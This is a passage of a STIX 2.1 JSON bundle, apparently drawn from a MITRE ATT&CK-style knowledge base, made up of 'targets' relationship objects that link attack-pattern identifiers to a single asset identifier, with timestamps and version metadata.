"relationship--47aa18ab-85b8-4cf9-9b1a-5a62eb998521", "created": "2024-07-01T10:37:15.828121", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828124", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--151134f0-6946-47ed-9d0a-2de69fc9999b", "created": "2024-07-01T10:37:15.828131", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828133", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1d65435f-4bbe-4b1c-9ad0-c5269c5eadfa", "created": "2024-07-01T10:37:15.828141", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828143", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21c93935-3f49-46c6-a78e-a980e601b485", "created": "2024-07-01T10:37:15.828151", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828153", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a04ef4e-c9ba-4a10-9abe-e3f87528ffaf", "created": "2024-07-01T10:37:15.828161", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828164", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9618968e-467d-4a01-8af4-976a0a10bd0f", "created": "2024-07-01T10:37:15.828171", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828173", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f18db528-5d8a-4a1d-bf9c-ce987c57303b", "created": "2024-07-01T10:37:15.828181", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828184", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40d5d99a-dcd9-4fd7-bdea-7cf99476e898", "created": "2024-07-01T10:37:15.828191", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828193", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5ced8a38-6e95-4d1c-bbaa-65248d5a39e2", "created": "2024-07-01T10:37:15.828201", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828203", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ab0c3c5-82f1-4d50-a92f-bc1c9f87f1db", "created": "2024-07-01T10:37:15.828211", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828213", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c938cf1a-43f4-45b6-929e-4a12ff6afe44", "created": "2024-07-01T10:37:15.828221", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828223", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bdd4149d-fbce-4a0b-8b8f-519690e4190a", "created": "2024-07-01T10:37:15.828231", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828233", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0743549b-6cff-4706-bb6f-645cc9c4dc7c", "created": "2024-07-01T10:37:15.828241", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828243", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2bbb1eda-edb2-4abd-9a1f-b19354ea3491", "created": "2024-07-01T10:37:15.828251", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828253", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--747434fa-abcb-43a1-b4eb-bfd21a97d6a9", "created": "2024-07-01T10:37:15.828261", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828263", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--abeea4db-2bec-46e7-aa27-d5d4e0e027bd", "created": "2024-07-01T10:37:15.828270", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828273", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6db7c630-8927-439c-af56-8658845389a2", "created": "2024-07-01T10:37:15.828280", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828282", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a47a912e-8dc3-48bb-9c4a-a6d4163af79e", "created": "2024-07-01T10:37:15.828290", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828292", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d0798635-1f40-4cfa-bc9e-07147898725c", "created": "2024-07-01T10:37:15.828300", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828302", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--55469e07-80cf-44d9-b245-517e868595f5", "created": "2024-07-01T10:37:15.828310", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828312", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7e2882f9-7216-49b4-a377-b58ccbfd99e8", "created": "2024-07-01T10:37:15.828320", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828322", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--960c3110-958a-4d2c-90f2-69cc4a3b552d", "created": "2024-07-01T10:37:15.828330", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828333", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3005311f-a8ab-426b-89b8-2979b0b4e9f2", "created": "2024-07-01T10:37:15.828340", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828343", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--410d109b-bc22-432c-987a-17ac9aeaac61", "created": "2024-07-01T10:37:15.828350", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828352", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4b6bc86-8d8d-41cf-ac66-b2730b5629da", "created": "2024-07-01T10:37:15.828360", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828362", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ecac043-095c-4b1f-a74e-0873234f0cd6", "created": "2024-07-01T10:37:15.828371", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828373", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd7c91ea-bd4e-4c11-9a3e-6a621796d2db", "created": "2024-07-01T10:37:15.828381", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828383", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a974a7b9-98f8-4960-964a-244c3d6811a1", "created": "2024-07-01T10:37:15.828390", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828393", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dd7541d0-805c-439b-bbc9-d10c365955bb", "created": "2024-07-01T10:37:15.828401", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828403", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6caef07c-d114-4a5a-9788-67d3113071eb", "created": "2024-07-01T10:37:15.828411", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828413", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--597d0d39-4c48-4444-aaee-a655c2cfd74a", "created": "2024-07-01T10:37:15.828421", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828423", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a875322b-4a95-42c6-a465-ebc26c7ab47f", "created": "2024-07-01T10:37:15.828431", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828433", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14963b5b-f02f-45c7-b2ee-d2a464ff672f", "created": "2024-07-01T10:37:15.828441", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828443", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10b963e1-9906-45a5-952d-1990644e2815", "created": "2024-07-01T10:37:15.828451", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828453", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39501a8b-3e6b-49dd-ab0e-fc65dadc4f9e", "created": "2024-07-01T10:37:15.828461", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828463", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--98fb016e-44f3-49c0-94cd-85b76400ece8", "created": "2024-07-01T10:37:15.828471", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828473", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a9062e8-309b-4168-b5c0-7cdb21c72096", "created": "2024-07-01T10:37:15.828480", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828483", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a47f47df-9d09-4bc8-9ec6-4572408042dc", "created": "2024-07-01T10:37:15.828490", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828493", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7407f037-155e-4f7c-a408-5511db1c931a", "created": "2024-07-01T10:37:15.828500", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828502", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b1faa01-e854-4d6f-8c7f-f6660f3a5249", "created": "2024-07-01T10:37:15.828511", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828513", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b807d20-b18e-4745-b11d-c0d48638b8e4", "created": "2024-07-01T10:37:15.828521", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828523", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be2f4614-8f23-4617-ab26-605e2c2d1523", "created": "2024-07-01T10:37:15.828531", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": 